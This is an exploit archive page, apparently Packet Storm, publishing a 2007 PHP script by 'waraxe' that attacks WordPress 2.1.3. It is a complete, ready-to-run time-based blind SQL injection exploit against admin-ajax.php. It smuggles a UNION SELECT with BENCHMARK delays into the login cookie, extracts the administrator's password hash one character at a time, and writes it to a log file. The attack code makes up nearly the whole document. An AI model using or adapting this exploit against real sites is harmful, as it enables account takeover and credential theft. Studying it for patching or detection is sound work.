exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

wp213-ajax.txt

wp213-ajax.txt
Posted May 22, 2007
Authored by Janek Vind aka waraxe | Site waraxe.us

Wordpress version 2.1.3 suffers from a blind SQL injection vulnerability in admin-ajax.php.

tags | exploit, php, sql injection
SHA-256 | 10c405189b522f3fdc50b8f1ca2a00587c6d7ee520495bc6b430efd405303e66
Download | Favorite | View

wp213-ajax.txt

Change Mirror Download
<?php
error_reporting(E_ALL);
$norm_delay = 0;
///////////////////////////////////////////////////////////////////////
///////////////////////////////////////////////////////////////////////
// WordPress 2.1.3 "admin-ajax.php" sql injection blind fishing exploit
// written by Janek Vind "waraxe"
// http://www.waraxe.us/
// 21. may 2007
///////////////////////////////////////////////////////////////////////
///////////////////////////////////////////////////////////////////////
//=====================================================================
$outfile = './warlog.txt';// Log file
$url = 'http://localhost/wordpress.2.1.3/wp-admin/admin-ajax.php';
$testcnt = 300000;// Use bigger numbers, if server is slow, default is 300000
$id = 1;// ID of the target user, default value "1" is admin's ID
$suffix = '';// Override value, if needed
$prefix = 'wp_';// WordPress table prefix, default is "wp_"
//======================================================================

echo "Target: $url\n";
echo "sql table prefix: $prefix\n";

if(empty($suffix))
{
  $suffix = md5(substr($url, 0, strlen($url) - 24));
}

echo "cookie suffix: $suffix\n";

echo "testing probe delays \n";

$norm_delay = get_normdelay($testcnt);
echo "normal delay: $norm_delay deciseconds\n";

$hash = get_hash();

add_line("Target: $url");
add_line("User ID: $id");
add_line("Hash: $hash");

echo "\nWork finished\n";
echo "Questions and feedback - http://www.waraxe.us/ \n";
die("See ya! :) \n");
///////////////////////////////////////////////////////////////////////
///////////////////////////////////////////////////////////////////////
function get_hash()
{
  $len = 32;
  $field = 'user_pass';
  $out = '';
  
  echo "finding hash now ...\n";
  
  for($i = 1; $i < $len + 1; $i ++)
  {
    $ch = get_hashchar($field,$i);
    echo "got $field pos $i --> $ch\n";
    $out .= "$ch";
    echo "current value for $field: $out \n";
  }
  
  echo "\nFinal result: $field=$out\n\n";
  
  return $out;
}
///////////////////////////////////////////////////////////////////////
function get_hashchar($field,$pos)
{
  global $prefix, $suffix, $id, $testcnt;
  $char = '';
  $cnt = $testcnt * 4;
  $ppattern = 'cookie=wordpressuser_%s%%3dxyz%%2527%s; wordpresspass_%s%%3dp0hh';
  $ipattern = " UNION ALL SELECT 1,2,user_pass,4,5,6,7,8,9,10 FROM %susers WHERE ID=%d AND IF(ORD(SUBSTRING($field,$pos,1))%s,BENCHMARK($cnt,MD5(1337)),3)/*";

  // First let's determine, if it's number or letter
  $inj = sprintf($ipattern, $prefix, $id, ">57");
  $post = sprintf($ppattern, $suffix, $inj, $suffix);
  $letter = test_condition($post);
  
  if($letter)
  {
    $min = 97;
    $max = 102;
    echo "char to find is [a-f]\n";
  }
  else
  {
    $min = 48;
    $max = 57;
    echo "char to find is [0-9]\n";
  }

  $curr = 0;
  
  while(1)
  {
    $area = $max - $min;
    if($area < 2 )
    {
      $inj = sprintf($ipattern, $prefix, $id, "=$max");
      $post = sprintf($ppattern, $suffix, $inj, $suffix);
      $eq = test_condition($post);
      
      if($eq)
      {
        $char = chr($max);
      }
      else
      {
        $char = chr($min);
      }
      
      break;
    }
    
    $half = intval(floor($area / 2));
    $curr = $min + $half;
    
    $inj = sprintf($ipattern, $prefix, $id, ">$curr");
    $post = sprintf($ppattern, $suffix, $inj, $suffix);
    
    $bigger = test_condition($post);
    
    if($bigger)
    {
      $min = $curr;
    }
    else
    {
      $max = $curr;
    }

    echo "curr: $curr--$max--$min\n";
  }
  
  return $char;
}
///////////////////////////////////////////////////////////////////////
function test_condition($p)
{
  global $url, $norm_delay;
  $bret = false;
  $maxtry = 10;
  $try = 1;
  
  while(1)
  {
    $start = getmicrotime();
    $buff = make_post($url, $p);
    $end = getmicrotime();
  
    if($buff === '-1')
    {
      break;
    }
    else
    {
      echo "test_condition() - try $try - invalid return value ...\n";
      $try ++;
      if($try > $maxtry)
      {
        die("too many tries - exiting ...\n");
      }
      else
      {
        echo "trying again - try $try ...\n";
      }
    }
  }
  
  $diff = $end - $start;
  $delay = intval($diff * 10);
  
  if($delay > ($norm_delay * 2))
  {
    $bret = true;
  }
  
  return $bret;
}
///////////////////////////////////////////////////////////////////////
function get_normdelay($testcnt)
{
  $fa = test_md5delay(1);
  echo "$fa\n";
  $sa = test_md5delay($testcnt);
  echo "$sa\n";
  $fb = test_md5delay(1);
  echo "$fb\n";
  $sb = test_md5delay($testcnt);
  echo "$sb\n";
  $fc = test_md5delay(1);
  echo "$fc\n";
  $sc = test_md5delay($testcnt);
  echo "$sc\n";
  
  $mean_nondelayed = intval(($fa + $fb + $fc) / 3);
  echo "mean nondelayed - $mean_nondelayed dsecs\n";
  $mean_delayed = intval(($sa + $sb + $sc) / 3);
  echo "mean delayed - $mean_delayed dsecs\n";
  
  return $mean_delayed;
}
///////////////////////////////////////////////////////////////////////
function test_md5delay($cnt)
{
  global $url, $id, $prefix, $suffix;
  
  // delay in deciseconds
  $delay = -1;
  $ppattern = 'cookie=wordpressuser_%s%%3dxyz%%2527%s; wordpresspass_%s%%3dp0hh';
  $ipattern = ' UNION ALL SELECT 1,2,user_pass,4,5,6,7,8,9,10 FROM %susers WHERE ID=%d AND IF(LENGTH(user_pass)>31,BENCHMARK(%d,MD5(1337)),3)/*';
  $inj = sprintf($ipattern, $prefix, $id, $cnt);
  $post = sprintf($ppattern, $suffix, $inj, $suffix); 

  $start = getmicrotime();
  $buff = make_post($url, $post);
  $end = getmicrotime();
  
  if(intval($buff) !== -1)
  {
    die("test_md5delay($cnt) - invalid return value, exiting ...");
  }

  $diff = $end - $start;
  $delay = intval($diff * 10);

  return $delay;
}
///////////////////////////////////////////////////////////////////////
function getmicrotime() 
{ 
    list($usec, $sec) = explode(" ", microtime()); 
    return ((float)$usec + (float)$sec); 
} 
///////////////////////////////////////////////////////////////////////
function make_post($url, $post_fields='', $cookie = '', $referer = '', $headers = FALSE)
{
  $ch = curl_init();
  $timeout = 120;
  curl_setopt ($ch, CURLOPT_URL, $url);
  curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
  curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, $timeout);
  curl_setopt($ch, CURLOPT_POST, 1); 
  curl_setopt($ch, CURLOPT_POSTFIELDS, $post_fields); 
  curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 0);
  curl_setopt ($ch, CURLOPT_USERAGENT, 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)');
  
  if(!empty($cookie))
  {
    curl_setopt ($ch, CURLOPT_COOKIE, $cookie);
  }
 
  if(!empty($referer))
  {
    curl_setopt ($ch, CURLOPT_REFERER, $referer);
  }

  if($headers === TRUE)
  {
    curl_setopt ($ch, CURLOPT_HEADER, TRUE);
  }
  else
  {
    curl_setopt ($ch, CURLOPT_HEADER, FALSE);
  }

  $fc = curl_exec($ch);
  curl_close($ch);
  
  return $fc;
}
///////////////////////////////////////////////////////////////////////
function add_line($buf)
{
  global $outfile;
  
  $buf .= "\n";
  $fh = fopen($outfile, 'ab');
  fwrite($fh, $buf);
  fclose($fh);
  
}
///////////////////////////////////////////////////////////////////////
?>


Login or Register to add favorites

File Archive:

April 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Apr 1st
    10 Files
  • 2
    Apr 2nd
    26 Files
  • 3
    Apr 3rd
    40 Files
  • 4
    Apr 4th
    6 Files
  • 5
    Apr 5th
    26 Files
  • 6
    Apr 6th
    0 Files
  • 7
    Apr 7th
    0 Files
  • 8
    Apr 8th
    22 Files
  • 9
    Apr 9th
    14 Files
  • 10
    Apr 10th
    10 Files
  • 11
    Apr 11th
    13 Files
  • 12
    Apr 12th
    14 Files
  • 13
    Apr 13th
    0 Files
  • 14
    Apr 14th
    0 Files
  • 15
    Apr 15th
    30 Files
  • 16
    Apr 16th
    10 Files
  • 17
    Apr 17th
    22 Files
  • 18
    Apr 18th
    45 Files
  • 19
    Apr 19th
    0 Files
  • 20
    Apr 20th
    0 Files
  • 21
    Apr 21st
    0 Files
  • 22
    Apr 22nd
    0 Files
  • 23
    Apr 23rd
    0 Files
  • 24
    Apr 24th
    0 Files
  • 25
    Apr 25th
    0 Files
  • 26
    Apr 26th
    0 Files
  • 27
    Apr 27th
    0 Files
  • 28
    Apr 28th
    0 Files
  • 29
    Apr 29th
    0 Files
  • 30
    Apr 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Site Links
News by Month
News Tags
Files by Month
File Tags
File Directory
About Us
History & Purpose
Contact Information
Terms of Service
Privacy Statement
Copyright Information
Services
Security Services
Hosting By
Rokasec
close